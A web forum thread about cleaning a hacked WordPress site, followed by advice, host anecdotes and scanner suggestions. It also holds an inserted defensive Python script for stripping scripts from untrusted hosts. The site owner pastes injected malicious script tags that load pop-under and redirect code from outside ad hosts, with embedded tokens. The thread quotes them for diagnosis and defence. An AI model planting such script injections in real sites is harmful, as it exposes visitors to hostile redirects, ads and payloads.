Anyone know how to clean a site with malware? My site funny-tshirts.com has it bad and I really can't afford $250 to clean it up. Thanks for any help.
Delete it and restore from backup. Delete the system files and upload a clean version. Go through every file looking for code that is out of place.
It was an old site that hasn't been hosted in almost a year. I just happened to have the files for it, so there isn't really anything I can do when it comes to restoring it. Going through files looking for code wouldn't be practical. I don't think I could "delete the system files and upload clean version". I was on the phone with my host "Host Gator" earlier when we were putting up my site and I think he did that, but it still has the malware.
Are you sure that you've not got a backup of the files that's known to be clean? Btw: you should change your FTP password anyway; make sure that the new password is a strong one.
No backup. My host cleaned a lot of it today. It might be solved, but not sure yet. Site is up, not great, but up. Have to fix a bunch of stuff on it though.
How long was the wait? A couple of days ago I tried to call regarding one of my sites and the wait was 92 minutes. I hope the whole virus thing is not going to further affect their customer service.
With Host Gator? I've been on the phone with them several times and the wait has only been a couple minutes each time.
So I had to pretty much delete everything on the host and the database and start over. I installed WordPress from scratch. Before I did that, I used the basic tools in WordPress and exported posts, pages, media, etc. I kept all that. When I opened the fresh install of my site, I went ahead and imported those files to see the results. I at least got to keep the main content. Well, it looks like the malware is still there and obviously was in the exported files of my exported pages. It looks like they are in the pages and not the posts and I found the code that is the problem, but I can't tell where it starts and where it stops. Here is the code:
    #pl-2 .panel-grid .panel-grid-cell-mobile-last { margin-bottom:0px } } </style><script type="text/javascript">
    var adlinkfly_url = 'https://funny-tshirts.com/';
    var adlinkfly_api_token = 'f6624368d190e8c1819f49dc4d5fcb633a4d9641';
    var adlinkfly_advert = 2;
    var adlinkfly_exclude_domains = ['example.com', 'yoursite.com'];
    </script>
    <script src='//cutwin.com/js/full-page-script.js'></script>
    <script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script type="text/javascript">//<![CDATA[
    (function() {
    var configuration = {
    "token": "11f0dc1ed8453e409e04d86bea962f34",
    "exitScript": { "enabled": true },
    "popUnder": { "enabled": true }
    };
Any idea? Most of this code is in there several times so I'm thinking if I can find where it starts and begins, I could delete it, save the code, and start all over again.
Unless you know the scripts referred to in lines 7 and 8 are clean, I'd get rid of them. pub2srv looks like it would be an ad publisher but redirects to
    hxxp://cobalten.com/apu.php?zoneid=683723
and downloads a file with
    empty OK
go mobisla downloaded a notice.php with this
    empty OK
but I suspect when called from a webserver both scripts do something very, very nasty.
Oh yeah, I know that code in 7&8 are definitely malware. I just don't know if I should delete anything before or after that. I'm not a coder, so I don't know how bad it would be or not be if I left incomplete code behind.
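On the question above of where each injected block starts and stops: the safe unit to delete is a whole element, from `<script ...>` through its matching `</script>`. The following is an added example, not part of any post in the thread, that applies this to exported page content; the allowlist, the marker list and the sample input are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Assumption: the only host this site should load scripts from.
ALLOWED_HOSTS = {"funny-tshirts.com"}
# Variable prefix from the injected inline block quoted in the thread.
INLINE_MARKERS = ("adlinkfly_",)

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script\s*>", re.I | re.S)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
OPEN_RE = re.compile(r"<script\b", re.I)

# Constructed sample modelled on the thread's snippet (tokens left out).
SAMPLE = (
    "<p>Shirt sizing guide</p>"
    '<script type="text/javascript"> var adlinkfly_advert = 2; </script> '
    "<script src='//cutwin.com/js/full-page-script.js'></script> "
    '<script src="/wp-includes/js/jquery/jquery.js"></script>'
    '<script type="text/javascript">//<![CDATA[ (function() {'
)

def classify(attrs, body):
    """Return why a script element looks injected, or None if it looks fine."""
    m = SRC_RE.search(attrs)
    if m:
        src = m.group(1)
        # Protocol-relative URLs (//host/path) need a scheme to parse.
        host = urlparse("https:" + src if src.startswith("//") else src).hostname
        if host and host.lower() not in ALLOWED_HOSTS:
            return "external src: " + host.lower()
    if any(marker in body for marker in INLINE_MARKERS):
        return "inline marker"
    return None

def clean(html):
    """Remove flagged elements whole; return (cleaned, findings, unterminated)."""
    out, findings, pos = [], [], 0
    for m in SCRIPT_RE.finditer(html):
        out.append(html[pos:m.start()])
        reason = classify(m.group(1), m.group(2))
        if reason:
            findings.append((m.start(), m.end(), reason))
        else:
            out.append(m.group(0))
        pos = m.end()
    # A trailing <script> with no closing tag is reported, not cut.
    dangling = OPEN_RE.search(html, pos)
    out.append(html[pos:])
    return "".join(out), findings, dangling.start() if dangling else None
```

A non-`None` third value means the content ends inside an unclosed script, as the pasted snippet does, so that page needs a manual look before it is re-imported.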
and these lines make me curious:
    var adlinkfly_api_token = 'f6624368d190e8c1819f49dc4d5fcb633a4d9641';
    "token": "11f0dc1ed8453e409e04d86bea962f34",
Clean a site with "malware"? How about you just review the code and remove anything malicious that you didn't write. And if you don't care about the site take it down and move the fuck on.
If the work had value the domain wouldn't have been parked for a year, right? I've been there, have been paying for a domain for years, the site had been hacked so hosting account was locked and I needed to contact the host's admin and negotiate to have it unlocked. In the end, I decided that none of the content mattered so I deleted it from my reseller panel and added it back in.
Same. And also if you use shared environments expect unexpected guests to infringe. I've had scripts people added code to with ads and redirects. What did I do?
1. Restore my site from current back ups. (I have learned to back up the back up and the back and to do this over and over and often).
2. Move out of a shared environment to at least a VPS or cloud account. If your site is important then it's worth the extra money.
If you didn't back up your site then go through the code. If you don't have the time then pay someone else. If you don't have the money or the time then you have just realized how unimportant this site is. So take it down and move on.
Hi Thomas Scheetz, I am a developer of WordPress & PHP with more than 7+ years' experience. Your site doesn't have any malware: https://sitecheck.sucuri.net/results/funny-tshirts.com https://www.siteguarding.com/ You can even check on that.
You can use tools that scan your site remotely to find malicious payloads and malware. Sucuri has a free WordPress plugin that you can find in the official WordPress repository.